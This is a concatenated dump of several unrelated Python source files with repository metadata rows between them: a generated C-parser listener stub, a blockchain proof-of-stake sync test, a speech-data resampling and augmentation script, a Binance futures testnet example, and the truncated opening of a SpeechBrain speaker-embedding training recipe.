pass
# Enter a parse tree produced by CParser#function_definition.
# @param ctx Type: CParser.Function_definitionContext
def enterFunction_definition(self,ctx):
pass
# Exit a parse tree produced by CParser#function_definition.
# @param ctx Type: CParser.Function_definitionContext
def exitFunction_definition(self,ctx):
pass
# Enter a parse tree produced by CParser#declaration_specifiers.
# @param ctx Type: CParser.Declaration_specifiersContext
def enterDeclaration_specifiers(self,ctx):
pass
# Exit a parse tree produced by CParser#declaration_specifiers.
# @param ctx Type: CParser.Declaration_specifiersContext
def exitDeclaration_specifiers(self,ctx):
pass
# Enter a parse tree produced by CParser#declaration.
# @param ctx Type: CParser.DeclarationContext
def enterDeclaration(self,ctx):
pass
# Exit a parse tree produced by CParser#declaration.
# @param ctx Type: CParser.DeclarationContext
def exitDeclaration(self,ctx):
pass
# Enter a parse tree produced by CParser#init_declarator_list.
# @param ctx Type: CParser.Init_declarator_listContext
def enterInit_declarator_list(self,ctx):
pass
# Exit a parse tree produced by CParser#init_declarator_list.
# @param ctx Type: CParser.Init_declarator_listContext
def exitInit_declarator_list(self,ctx):
pass
# Enter a parse tree produced by CParser#init_declarator.
# @param ctx Type: CParser.Init_declaratorContext
def enterInit_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#init_declarator.
# @param ctx Type: CParser.Init_declaratorContext
def exitInit_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#storage_class_specifier.
# @param ctx Type: CParser.Storage_class_specifierContext
def enterStorage_class_specifier(self,ctx):
pass
# Exit a parse tree produced by CParser#storage_class_specifier.
# @param ctx Type: CParser.Storage_class_specifierContext
def exitStorage_class_specifier(self,ctx):
pass
# Enter a parse tree produced by CParser#type_specifier.
# @param ctx Type: CParser.Type_specifierContext
def enterType_specifier(self,ctx):
pass
# Exit a parse tree produced by CParser#type_specifier.
# @param ctx Type: CParser.Type_specifierContext
def exitType_specifier(self,ctx):
pass
# Enter a parse tree produced by CParser#type_id.
# @param ctx Type: CParser.Type_idContext
def enterType_id(self,ctx):
pass
# Exit a parse tree produced by CParser#type_id.
# @param ctx Type: CParser.Type_idContext
def exitType_id(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_or_union_specifier.
# @param ctx Type: CParser.Struct_or_union_specifierContext
def enterStruct_or_union_specifier(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_or_union_specifier.
# @param ctx Type: CParser.Struct_or_union_specifierContext
def exitStruct_or_union_specifier(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_or_union.
# @param ctx Type: CParser.Struct_or_unionContext
def enterStruct_or_union(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_or_union.
# @param ctx Type: CParser.Struct_or_unionContext
def exitStruct_or_union(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_declaration_list.
# @param ctx Type: CParser.Struct_declaration_listContext
def enterStruct_declaration_list(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_declaration_list.
# @param ctx Type: CParser.Struct_declaration_listContext
def exitStruct_declaration_list(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_declaration.
# @param ctx Type: CParser.Struct_declarationContext
def enterStruct_declaration(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_declaration.
# @param ctx Type: CParser.Struct_declarationContext
def exitStruct_declaration(self,ctx):
pass
# Enter a parse tree produced by CParser#specifier_qualifier_list.
# @param ctx Type: CParser.Specifier_qualifier_listContext
def enterSpecifier_qualifier_list(self,ctx):
pass
# Exit a parse tree produced by CParser#specifier_qualifier_list.
# @param ctx Type: CParser.Specifier_qualifier_listContext
def exitSpecifier_qualifier_list(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_declarator_list.
# @param ctx Type: CParser.Struct_declarator_listContext
def enterStruct_declarator_list(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_declarator_list.
# @param ctx Type: CParser.Struct_declarator_listContext
def exitStruct_declarator_list(self,ctx):
pass
# Enter a parse tree produced by CParser#struct_declarator.
# @param ctx Type: CParser.Struct_declaratorContext
def enterStruct_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#struct_declarator.
# @param ctx Type: CParser.Struct_declaratorContext
def exitStruct_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#enum_specifier.
# @param ctx Type: CParser.Enum_specifierContext
def enterEnum_specifier(self,ctx):
pass
# Exit a parse tree produced by CParser#enum_specifier.
# @param ctx Type: CParser.Enum_specifierContext
def exitEnum_specifier(self,ctx):
pass
# Enter a parse tree produced by CParser#enumerator_list.
# @param ctx Type: CParser.Enumerator_listContext
def enterEnumerator_list(self,ctx):
pass
# Exit a parse tree produced by CParser#enumerator_list.
# @param ctx Type: CParser.Enumerator_listContext
def exitEnumerator_list(self,ctx):
pass
# Enter a parse tree produced by CParser#enumerator.
# @param ctx Type: CParser.EnumeratorContext
def enterEnumerator(self,ctx):
pass
# Exit a parse tree produced by CParser#enumerator.
# @param ctx Type: CParser.EnumeratorContext
def exitEnumerator(self,ctx):
pass
# Enter a parse tree produced by CParser#type_qualifier.
# @param ctx Type: CParser.Type_qualifierContext
def enterType_qualifier(self,ctx):
pass
# Exit a parse tree produced by CParser#type_qualifier.
# @param ctx Type: CParser.Type_qualifierContext
def exitType_qualifier(self,ctx):
pass
# Enter a parse tree produced by CParser#declarator.
# @param ctx Type: CParser.DeclaratorContext
def enterDeclarator(self,ctx):
pass
# Exit a parse tree produced by CParser#declarator.
# @param ctx Type: CParser.DeclaratorContext
def exitDeclarator(self,ctx):
pass
# Enter a parse tree produced by CParser#direct_declarator.
# @param ctx Type: CParser.Direct_declaratorContext
def enterDirect_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#direct_declarator.
# @param ctx Type: CParser.Direct_declaratorContext
def exitDirect_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#declarator_suffix.
# @param ctx Type: CParser.Declarator_suffixContext
def enterDeclarator_suffix(self,ctx):
pass
# Exit a parse tree produced by CParser#declarator_suffix.
# @param ctx Type: CParser.Declarator_suffixContext
def exitDeclarator_suffix(self,ctx):
pass
# Enter a parse tree produced by CParser#pointer.
# @param ctx Type: CParser.PointerContext
def enterPointer(self,ctx):
pass
# Exit a parse tree produced by CParser#pointer.
# @param ctx Type: CParser.PointerContext
def exitPointer(self,ctx):
pass
# Enter a parse tree produced by CParser#parameter_type_list.
# @param ctx Type: CParser.Parameter_type_listContext
def enterParameter_type_list(self,ctx):
pass
# Exit a parse tree produced by CParser#parameter_type_list.
# @param ctx Type: CParser.Parameter_type_listContext
def exitParameter_type_list(self,ctx):
pass
# Enter a parse tree produced by CParser#parameter_list.
# @param ctx Type: CParser.Parameter_listContext
def enterParameter_list(self,ctx):
pass
# Exit a parse tree produced by CParser#parameter_list.
# @param ctx Type: CParser.Parameter_listContext
def exitParameter_list(self,ctx):
pass
# Enter a parse tree produced by CParser#parameter_declaration.
# @param ctx Type: CParser.Parameter_declarationContext
def enterParameter_declaration(self,ctx):
pass
# Exit a parse tree produced by CParser#parameter_declaration.
# @param ctx Type: CParser.Parameter_declarationContext
def exitParameter_declaration(self,ctx):
pass
# Enter a parse tree produced by CParser#identifier_list.
# @param ctx Type: CParser.Identifier_listContext
def enterIdentifier_list(self,ctx):
pass
# Exit a parse tree produced by CParser#identifier_list.
# @param ctx Type: CParser.Identifier_listContext
def exitIdentifier_list(self,ctx):
pass
# Enter a parse tree produced by CParser#type_name.
# @param ctx Type: CParser.Type_nameContext
def enterType_name(self,ctx):
pass
# Exit a parse tree produced by CParser#type_name.
# @param ctx Type: CParser.Type_nameContext
def exitType_name(self,ctx):
pass
# Enter a parse tree produced by CParser#abstract_declarator.
# @param ctx Type: CParser.Abstract_declaratorContext
def enterAbstract_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#abstract_declarator.
# @param ctx Type: CParser.Abstract_declaratorContext
def exitAbstract_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#direct_abstract_declarator.
# @param ctx Type: CParser.Direct_abstract_declaratorContext
def enterDirect_abstract_declarator(self,ctx):
pass
# Exit a parse tree produced by CParser#direct_abstract_declarator.
# @param ctx Type: CParser.Direct_abstract_declaratorContext
def exitDirect_abstract_declarator(self,ctx):
pass
# Enter a parse tree produced by CParser#abstract_declarator_suffix.
# @param ctx Type: CParser.Abstract_declarator_suffixContext
def enterAbstract_declarator_suffix(self,ctx):
pass
# Exit a parse tree produced by CParser#abstract_declarator_suffix.
# @param ctx Type: CParser.Abstract_declarator_suffixContext
def exitAbstract_declarator_suffix(self,ctx):
pass
# Enter a parse tree produced by CParser#initializer.
# @param ctx Type: CParser.InitializerContext
def enterInitializer(self,ctx):
pass
# Exit a parse tree produced by CParser#initializer.
# @param ctx Type: CParser.InitializerContext
def exitInitializer(self,ctx):
pass
# Enter a parse tree produced by CParser#initializer_list.
# @param ctx Type: CParser.Initializer_listContext
def enterInitializer_list(self,ctx):
pass
# Exit a parse tree produced by CParser#initializer_list.
# @param ctx Type: CParser.Initializer_listContext
def exitInitializer_list(self,ctx):
pass
# Enter a parse tree produced by CParser#argument_expression_list.
# @param ctx Type: CParser.Argument_expression_listContext
def enterArgument_expression_list(self,ctx):
pass
# Exit a parse tree produced by CParser#argument_expression_list.
# @param ctx Type: CParser.Argument_expression_listContext
def exitArgument_expression_list(self,ctx):
pass
# Enter a parse tree produced by CParser#additive_expression.
# @param ctx Type: CParser.Additive_expressionContext
def enterAdditive_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#additive_expression.
# @param ctx Type: CParser.Additive_expressionContext
def exitAdditive_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#multiplicative_expression.
# @param ctx Type: CParser.Multiplicative_expressionContext
def enterMultiplicative_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#multiplicative_expression.
# @param ctx Type: CParser.Multiplicative_expressionContext
def exitMultiplicative_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#cast_expression.
# @param ctx Type: CParser.Cast_expressionContext
def enterCast_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#cast_expression.
# @param ctx Type: CParser.Cast_expressionContext
def exitCast_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#unary_expression.
# @param ctx Type: CParser.Unary_expressionContext
def enterUnary_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#unary_expression.
# @param ctx Type: CParser.Unary_expressionContext
def exitUnary_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#postfix_expression.
# @param ctx Type: CParser.Postfix_expressionContext
def enterPostfix_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#postfix_expression.
# @param ctx Type: CParser.Postfix_expressionContext
def exitPostfix_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#macro_parameter_list.
# @param ctx Type: CParser.Macro_parameter_listContext
def enterMacro_parameter_list(self,ctx):
pass
# Exit a parse tree produced by CParser#macro_parameter_list.
# @param ctx Type: CParser.Macro_parameter_listContext
def exitMacro_parameter_list(self,ctx):
pass
# Enter a parse tree produced by CParser#unary_operator.
# @param ctx Type: CParser.Unary_operatorContext
def enterUnary_operator(self,ctx):
pass
# Exit a parse tree produced by CParser#unary_operator.
# @param ctx Type: CParser.Unary_operatorContext
def exitUnary_operator(self,ctx):
pass
# Enter a parse tree produced by CParser#primary_expression.
# @param ctx Type: CParser.Primary_expressionContext
def enterPrimary_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#primary_expression.
# @param ctx Type: CParser.Primary_expressionContext
def exitPrimary_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#constant.
# @param ctx Type: CParser.ConstantContext
def enterConstant(self,ctx):
pass
# Exit a parse tree produced by CParser#constant.
# @param ctx Type: CParser.ConstantContext
def exitConstant(self,ctx):
pass
# Enter a parse tree produced by CParser#expression.
# @param ctx Type: CParser.ExpressionContext
def enterExpression(self,ctx):
pass
# Exit a parse tree produced by CParser#expression.
# @param ctx Type: CParser.ExpressionContext
def exitExpression(self,ctx):
pass
# Enter a parse tree produced by CParser#constant_expression.
# @param ctx Type: CParser.Constant_expressionContext
def enterConstant_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#constant_expression.
# @param ctx Type: CParser.Constant_expressionContext
def exitConstant_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#assignment_expression.
# @param ctx Type: CParser.Assignment_expressionContext
def enterAssignment_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#assignment_expression.
# @param ctx Type: CParser.Assignment_expressionContext
def exitAssignment_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#lvalue.
# @param ctx Type: CParser.LvalueContext
def enterLvalue(self,ctx):
pass
# Exit a parse tree produced by CParser#lvalue.
# @param ctx Type: CParser.LvalueContext
def exitLvalue(self,ctx):
pass
# Enter a parse tree produced by CParser#assignment_operator.
# @param ctx Type: CParser.Assignment_operatorContext
def enterAssignment_operator(self,ctx):
pass
# Exit a parse tree produced by CParser#assignment_operator.
# @param ctx Type: CParser.Assignment_operatorContext
def exitAssignment_operator(self,ctx):
pass
# Enter a parse tree produced by CParser#conditional_expression.
# @param ctx Type: CParser.Conditional_expressionContext
def enterConditional_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#conditional_expression.
# @param ctx Type: CParser.Conditional_expressionContext
def exitConditional_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#logical_or_expression.
# @param ctx Type: CParser.Logical_or_expressionContext
def enterLogical_or_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#logical_or_expression.
# @param ctx Type: CParser.Logical_or_expressionContext
def exitLogical_or_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#logical_and_expression.
# @param ctx Type: CParser.Logical_and_expressionContext
def enterLogical_and_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#logical_and_expression.
# @param ctx Type: CParser.Logical_and_expressionContext
def exitLogical_and_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#inclusive_or_expression.
# @param ctx Type: CParser.Inclusive_or_expressionContext
def enterInclusive_or_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#inclusive_or_expression.
# @param ctx Type: CParser.Inclusive_or_expressionContext
def exitInclusive_or_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#exclusive_or_expression.
# @param ctx Type: CParser.Exclusive_or_expressionContext
def enterExclusive_or_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#exclusive_or_expression.
# @param ctx Type: CParser.Exclusive_or_expressionContext
def exitExclusive_or_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#and_expression.
# @param ctx Type: CParser.And_expressionContext
def enterAnd_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#and_expression.
# @param ctx Type: CParser.And_expressionContext
def exitAnd_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#equality_expression.
# @param ctx Type: CParser.Equality_expressionContext
def enterEquality_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#equality_expression.
# @param ctx Type: CParser.Equality_expressionContext
def exitEquality_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#relational_expression.
# @param ctx Type: CParser.Relational_expressionContext
def enterRelational_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#relational_expression.
# @param ctx Type: CParser.Relational_expressionContext
def exitRelational_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#shift_expression.
# @param ctx Type: CParser.Shift_expressionContext
def enterShift_expression(self,ctx):
pass
# Exit a parse tree produced by CParser#shift_expression.
# @param ctx Type: CParser.Shift_expressionContext
def exitShift_expression(self,ctx):
pass
# Enter a parse tree produced by CParser#statement.
# @param ctx Type: CParser.StatementContext
def enterStatement(self,ctx):
pass
# Exit a parse tree produced by CParser#statement.
# @param ctx Type: CParser.StatementContext
def exitStatement(self,ctx):
pass
# Enter a parse tree produced by CParser#asm2_statement.
# @param ctx Type: CParser.Asm2_statementContext
def enterAsm2_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#asm2_statement.
# @param ctx Type: CParser.Asm2_statementContext
def exitAsm2_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#asm1_statement.
# @param ctx Type: CParser.Asm1_statementContext
def enterAsm1_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#asm1_statement.
# @param ctx Type: CParser.Asm1_statementContext
def exitAsm1_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#asm_statement.
# @param ctx Type: CParser.Asm_statementContext
def enterAsm_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#asm_statement.
# @param ctx Type: CParser.Asm_statementContext
def exitAsm_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#macro_statement.
# @param ctx Type: CParser.Macro_statementContext
def enterMacro_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#macro_statement.
# @param ctx Type: CParser.Macro_statementContext
def exitMacro_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#labeled_statement.
# @param ctx Type: CParser.Labeled_statementContext
def enterLabeled_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#labeled_statement.
# @param ctx Type: CParser.Labeled_statementContext
def exitLabeled_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#compound_statement.
# @param ctx Type: CParser.Compound_statementContext
def enterCompound_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#compound_statement.
# @param ctx Type: CParser.Compound_statementContext
def exitCompound_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#statement_list.
# @param ctx Type: CParser.Statement_listContext
def enterStatement_list(self,ctx):
pass
# Exit a parse tree produced by CParser#statement_list.
# @param ctx Type: CParser.Statement_listContext
def exitStatement_list(self,ctx):
pass
# Enter a parse tree produced by CParser#expression_statement.
# @param ctx Type: CParser.Expression_statementContext
def enterExpression_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#expression_statement.
# @param ctx Type: CParser.Expression_statementContext
def exitExpression_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#selection_statement.
# @param ctx Type: CParser.Selection_statementContext
def enterSelection_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#selection_statement.
# @param ctx Type: CParser.Selection_statementContext
def exitSelection_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#iteration_statement.
# @param ctx Type: CParser.Iteration_statementContext
def enterIteration_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#iteration_statement.
# @param ctx Type: CParser.Iteration_statementContext
def exitIteration_statement(self,ctx):
pass
# Enter a parse tree produced by CParser#jump_statement.
# @param ctx Type: CParser.Jump_statementContext
def enterJump_statement(self,ctx):
pass
# Exit a parse tree produced by CParser#jump_statement.
# @param ctx Type: CParser.Jump_statementContext
def exitJump_statement(self,ctx):
pass
| 31.848148 | 78 | 0.720743 |
79a82a179ae9aba21609ecce90fc11f8aed3a291 | 2,533 | py | Python | qa/rpc-tests/pos-sync.py | JSKitty/QuantisNet-Core | 75c66b11e29ea0597965471505e5da552d900d49 | [
"MIT"
] | 21 | 2019-06-03T22:24:33.000Z | 2021-04-10T14:14:26.000Z | qa/rpc-tests/pos-sync.py | JSKitty/QuantisNet-Core | 75c66b11e29ea0597965471505e5da552d900d49 | [
"MIT"
] | 3 | 2019-08-22T16:21:45.000Z | 2020-02-26T15:19:21.000Z | qa/rpc-tests/pos-sync.py | JSKitty/QuantisNet-Core | 75c66b11e29ea0597965471505e5da552d900d49 | [
"MIT"
] | 4 | 2019-06-04T22:11:05.000Z | 2020-05-22T18:20:32.000Z | #!/usr/bin/env python3
# Copyright (c) 2019 The QuantisNet Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import logging
class PoSSyncTest(BitcoinTestFramework):
    """Check that a freshly connected node can sync a chain that switched
    from PoW to PoS, including the full PoS segment, from scratch."""

    def __init__(self):
        super().__init__()
        self.setup_clean_chain = True
        self.num_nodes = 4
        node_args = ["-keypool=10", "-debug=stake", "-debug=net"]
        self.extra_args = [node_args, node_args, node_args, node_args]

    def setup_network(self, split=False):
        """Start all four nodes but connect only the first three; node 3
        stays isolated so it can later sync the whole chain from scratch."""
        self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, self.extra_args)
        connect_nodes_bi(self.nodes, 0, 1)
        connect_nodes_bi(self.nodes, 0, 2)
        connect_nodes_bi(self.nodes, 1, 2)
        self.is_network_split = False
        sync_blocks(self.nodes[:3])
        # First PoS block is at height 103 (see the PoW generation below).
        self.nodes[0].spork('SPORK_15_FIRST_POS_BLOCK', 103)

    def run_test(self):
        logging.info("Generating initial blockchain")
        # 100 + 1 + 1 PoW blocks = height 102 before the switch-over block.
        self.nodes[0].generate(100)
        sync_blocks(self.nodes[:3])
        self.nodes[1].generate(1)
        sync_blocks(self.nodes[:3])
        self.nodes[2].generate(1)
        sync_blocks(self.nodes[:3])
        assert_equal(self.nodes[0].getbalance(), 2*MINER_REWARD_DEC)
        assert_equal(self.nodes[1].getbalance(), 0)
        assert_equal(self.nodes[2].getbalance(), 0)
        assert_equal(self.nodes[3].getbalance(), 0)
        logging.info("Switching to PoS")
        assert_equal(self.nodes[0].getblockchaininfo()['pos'], False)
        # Block 103 triggers the SPORK_15 switch-over configured above.
        self.nodes[0].generate(1, 10)
        sync_blocks(self.nodes[:3])
        assert_equal(self.nodes[0].getblockchaininfo()['pos'], True)
        assert_equal(self.nodes[3].getblockchaininfo()['pos'], False)
        logging.info("Adding more PoS blocks")
        # 1000 iterations x 5 blocks = 5000 PoS blocks on top of the 103
        # PoW blocks, which is the height 5103 asserted below.
        for i in range(1000):
            set_node_times(self.nodes, GENESISTIME + i*180)
            assert_equal(len(self.nodes[0].generate(5, 50)), 5)
        # BUGFIX: a stray debugging `return` used to sit here, making the
        # entire "Syncing from scratch" phase below unreachable.  Removed
        # so the 5103-block assertions are actually exercised.
        logging.info("Syncing from scratch")
        connect_nodes_bi(self.nodes, 3, 0)
        connect_nodes_bi(self.nodes, 3, 1)
        connect_nodes_bi(self.nodes, 3, 2)
        self.sync_all()
        assert_equal(self.nodes[3].getblockchaininfo()['pos'], True)
        assert_equal(self.nodes[0].getinfo()['blocks'], 5103)
        assert_equal(self.nodes[3].getinfo()['blocks'], 5103)
# Run the functional test when invoked directly (standard test-framework entry point).
if __name__ == '__main__':
    PoSSyncTest().main()
| 38.378788 | 86 | 0.652191 |
50f918720a5e572acd4edb224aeeebcf7bbb3315 | 2,913 | py | Python | main.py | Jackson-Kang/Prosody-augmentation-for-Text-to-speech | 5407c20e59f0b5276d86f02f149aa02028f121b5 | [
"MIT"
] | 3 | 2020-12-21T19:08:50.000Z | 2021-06-05T09:27:49.000Z | main.py | Jackson-Kang/Prosody-augmentation-for-Text-to-speech | 5407c20e59f0b5276d86f02f149aa02028f121b5 | [
"MIT"
] | null | null | null | main.py | Jackson-Kang/Prosody-augmentation-for-Text-to-speech | 5407c20e59f0b5276d86f02f149aa02028f121b5 | [
"MIT"
] | null | null | null | from utils import *
from tuners import *
from configs import Arguments as args
from random import randrange
import ffmpeg
import sys
# [TO DO] rewrite metadata.csv to record metadata of augmented dataset
def change_sampling_rate():
	"""Resample every dataset listed in ``args.wav_paths`` to ``args.sampling_rate``.

	Resampled files are written under ``<args.save_dir>/resampled_wavs/<dataset>/``,
	keeping the original file names.  Resampling jobs run in parallel via
	``do_multiprocessing``.
	"""
	out_root = create_dir(args.save_dir)
	resample_root = create_dir(out_root, "resampled_wavs")
	# One output directory per dataset, named after the last path component.
	dataset_names = [path.split("/")[-1] for path in args.wav_paths]
	dataset_dirs = [create_dir(get_path(resample_root, name)) for name in dataset_names]
	inputs_per_dataset = [get_speech_path(path) for path in args.wav_paths]
	# Mirror each input path into its dataset's output directory.
	outputs_per_dataset = []
	for dataset_idx, input_paths in enumerate(inputs_per_dataset):
		outputs_per_dataset.append(
			[get_path(dataset_dirs[dataset_idx], p.split("/")[-1]) for p in input_paths]
		)
	for dataset_idx, input_paths in enumerate(inputs_per_dataset):
		print("\n\t[LOG] {} / {} processed...".format(dataset_idx + 1, len(inputs_per_dataset)))
		jobs = list(zip(input_paths, outputs_per_dataset[dataset_idx],
				[args.sampling_rate] * len(input_paths)))
		do_multiprocessing(resample_wav, jobs, args.num_jobs)
def augment_f(path):
	"""Write pitch-, speed-, and pitch+speed-augmented copies of one wav file.

	``path`` is an ``(in_wav_path, out_wav_path)`` tuple — the shape produced
	by the ``zip`` in ``augment_data`` and consumed via ``do_multiprocessing``.
	"""
	in_wav_path, out_wav_path = path
	audio = read_wav(in_wav_path, args.sampling_rate)
	# Each repeat presumably draws fresh random augmentation factors, and the
	# factor is embedded in the output filename, so repeats yield distinct
	# files rather than overwriting each other — TODO confirm in tuners.py.
	for _ in range(args.augment_repeat_numb):
		# Each augmenter appears to return (signal, factor): index [1] is used
		# for the filename suffix below and index [0] is the written signal.
		augmented_audios = [ pitch_augment(audio, args.sampling_rate),
				speed_augment(audio, low=0.5, high=1.8),
				pitch_and_speed_augment(audio, low=0.5, high=1.8)]
		# Build "<name>_pitch_<factor>.wav" etc. next to the intended output path.
		out_wav_paths = [ out_wav_path.replace(".wav", "") + postfix + str(augmented_audios[idx][1]) + ".wav" for idx, postfix in enumerate(("_pitch_", "_speed_", "_pitch_and_speed_"))]
		# NOTE: `audio` here shadows the outer variable only inside the
		# comprehension scope; the outer `audio` is untouched.
		[write_wav(out_wav_paths[idx], audio[0], args.sampling_rate, args.max_wav_value) for idx, audio in enumerate(augmented_audios)]
def augment_data():
	"""Create prosody-augmented copies of every resampled dataset.

	Reads wavs from ``<args.save_dir>/resampled_wavs/<dataset>/`` and writes
	the augmented versions produced by ``augment_f`` to
	``<args.save_dir>/augmented_wavs/<dataset>/``, running in parallel.
	"""
	out_root = create_dir(args.save_dir)
	augment_root = create_dir(out_root, "augmented_wavs")
	# One output directory per dataset, named after the last path component.
	dataset_names = [path.split("/")[-1] for path in args.wav_paths]
	dataset_dirs = [create_dir(get_path(augment_root, name)) for name in dataset_names]
	# Inputs are the previously resampled wavs, not the raw source wavs.
	inputs_per_dataset = [
		get_speech_path(get_path(args.save_dir, "resampled_wavs", name))
		for name in dataset_names
	]
	outputs_per_dataset = [
		[get_path(dataset_dirs[dataset_idx], p.split("/")[-1]) for p in input_paths]
		for dataset_idx, input_paths in enumerate(inputs_per_dataset)
	]
	for dataset_idx, input_paths in enumerate(inputs_per_dataset):
		print("\n\t[LOG] {} / {} processed...".format(dataset_idx + 1, len(inputs_per_dataset)))
		pairs = list(zip(input_paths, outputs_per_dataset[dataset_idx]))
		print(len(pairs))
		do_multiprocessing(augment_f, pairs, args.num_jobs)
if __name__ == "__main__":
	# CLI: python main.py <resample_flag> <augment_flag>
	# A flag is "on" when it is the string "True" or "1".  (sys.argv entries
	# are always strings, so the original non-string sentinels True and 1
	# could never match and have been dropped.)
	if len(sys.argv) < 3:
		# BUGFIX: the flags used to be read unconditionally, raising an
		# opaque IndexError when either argument was omitted.
		sys.exit("usage: python main.py <resample: True|1|False> <augment: True|1|False>")
	if sys.argv[1] in ("True", "1"):
		print("\n[LOG] start to change sampling rate of wav-signal")
		change_sampling_rate()
	if sys.argv[2] in ("True", "1"):
		print("\n[LOG] start to augment prosodies of speech dataset")
		augment_data()
| 45.515625 | 179 | 0.752832 |
b27c09b92a316e99fc41e18615536801c8a0635b | 300 | py | Python | examples/futures/account/brackets.py | leozaragoza/binance-connector-python | 3311d102c9e788e3d71047f0af103c00d1ae2162 | [
"MIT"
] | 3 | 2021-08-16T15:29:09.000Z | 2021-09-14T16:25:03.000Z | examples/futures/account/brackets.py | leozaragoza/binance-connector-python | 3311d102c9e788e3d71047f0af103c00d1ae2162 | [
"MIT"
] | null | null | null | examples/futures/account/brackets.py | leozaragoza/binance-connector-python | 3311d102c9e788e3d71047f0af103c00d1ae2162 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import logging
from binance.futures import Futures as Client
from binance.lib.utils import config_logging
# Log at DEBUG so full request/response details are visible.
config_logging(logging, logging.DEBUG)
# API credentials: left empty here; fill in your testnet key/secret before running.
key = ""
secret = ""
# Point the client at the Binance futures *testnet*, not production.
client = Client(key, secret, base_url="https://testnet.binancefuture.com")
# Query the notional/leverage brackets endpoint and log the raw response.
logging.info(client.brackets())
| 20 | 74 | 0.766667 |
5757600aad6de6927121532a0e38e9061fd17993 | 8,772 | py | Python | recipes/VoxCeleb/SpeakerRec/train_speaker_embeddings.py | Adel-Moumen/speechbrain | 1837bbdab24d40b73f3eb354db00fbb063e5aca4 | [
"Apache-2.0"
] | null | null | null | recipes/VoxCeleb/SpeakerRec/train_speaker_embeddings.py | Adel-Moumen/speechbrain | 1837bbdab24d40b73f3eb354db00fbb063e5aca4 | [
"Apache-2.0"
] | null | null | null | recipes/VoxCeleb/SpeakerRec/train_speaker_embeddings.py | Adel-Moumen/speechbrain | 1837bbdab24d40b73f3eb354db00fbb063e5aca4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
"""Recipe for training speaker embeddings (e.g, xvectors) using the VoxCeleb Dataset.
We employ an encoder followed by a speaker classifier.
To run this recipe, use the following command:
> python train_speaker_embeddings.py {hyperparameter_file}
Using your own hyperparameter file or one of the following:
hyperparams/train_x_vectors.yaml (for standard xvectors)
hyperparams/train_ecapa_tdnn.yaml (for the ecapa+tdnn system)
Author
* Mirco Ravanelli 2020
* Hwidong Na 2020
* Nauman Dawalatabad 2020
"""
import os
import sys
import random
import torch
import torchaudio
import speechbrain as sb
from speechbrain.utils.data_utils import download_file
from hyperpyyaml import load_hyperpyyaml
from speechbrain.utils.distributed import run_on_main
class SpeakerBrain(sb.core.Brain):
    """Brain subclass for speaker-embedding training.

    Runs an encoder (feature extraction + embedding model) followed by a
    speaker classifier, with waveform augmentation applied during training.
    """
    def compute_forward(self, batch, stage):
        """Computation pipeline based on a encoder + speaker classifier.
        Data augmentation and environmental corruption are applied to the
